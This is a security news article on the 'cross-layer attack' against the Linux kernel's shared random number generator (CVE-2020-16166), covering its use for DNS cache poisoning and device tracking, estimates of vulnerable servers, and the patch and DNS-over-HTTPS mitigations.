Security researchers have discovered a new attack technique known as cross-layer attack. Read on to know more about it…
A new attack technique called cross-layer attack has been identified, which combines vulnerabilities across multiple network protocol layers to attack the target system. It is estimated that one in every 20 web servers could be vulnerable to a security flaw that exists in the Linux kernel, allowing hackers to perform cross-layer attacks.
The Cross-layer Attack
The cross-layer attack is possible because the IPv6 flow label generation algorithm, UDP source port generation algorithm, and the IPv4 ID generation algorithm use the same Pseudo-Random Number Generator (PRNG). The flaw (CVE-2020-16166) in PRNG allows an attacker to obtain the internal state of any application using that PRNG. After obtaining the internal state of the PRNG from one of the OSI layers (network), the security flaw makes it possible to use this information to estimate the random number value in other OSI layers as well.
Estimating the PRNG value allows attackers to carry out DNS cache poisoning attacks to target Linux systems locally and remotely. The kernel vulnerability was discovered by Amit Klein, vice president of security research at SafeBreach and a security researcher at Israel’s Bar-Ilan University.
Security Risks
According to Klein, the most powerful version of the DNS attack is against Ubuntu servers, as those servers’ DNS stub resolver is especially vulnerable. The security flaw can allow hackers to recognize and track Android- and Linux-based devices. It works even when the browser privacy mode is On or VPN is in use. It has been estimated that around 13.4% of the vulnerable web servers are running Ubuntu and 3-5% of servers run on both Ubuntu and a public DNS service, having the necessary pre-conditions required for potential exploitation.
In fact, the number could be higher than this conservative estimate, Klein told The Daily Swig. Servers using external but private DNS servers, such as those run by ISPs, are also open to attack. Klein explained: “These may very well be vulnerable, though attacking them requires a bit more intel and preparations, which is why I could not demonstrate attacking them in my research.”
DNS cache poisoning, Klein warns, opens the door to a range of exploits. “It can be used to downgrade email security, hijack emails, hijack HTTP traffic, circumvent email anti-spam and blacklisting mechanisms, mount a local DoS attack (blackhole hosts), poison reverse DNS resolutions and attack the machine’s NTP [Network Time Protocol] client, responsible for the machine’s clock,” he said.
Mitigation
Fortunately, only Linux systems and those, such as Android, that run on top of the Linux kernel are vulnerable. Other Unix-based systems, such as macOS, use different PRNG algorithms.
The solution for Linux users is to replace the weak PRNG with stronger algorithms. Klein alerted the Linux security team in March 2020, and they developed a patch based on a stronger PRNG using SipHash.
New versions of Linux contain the new PRNG. In addition, DNS-over-HTTPS blocks the attack, if both the stub resolver and DNS server support it. But this does not prevent device tracking.
Conclusion
The latest versions of Linux contain the new PRNG, which is not affected by the security flaw. Therefore, experts recommend keeping all the applications and operating systems patched with the latest updates. In addition, DNS-over-HTTPS can be used to block the attack, if the stub resolver and DNS server support it.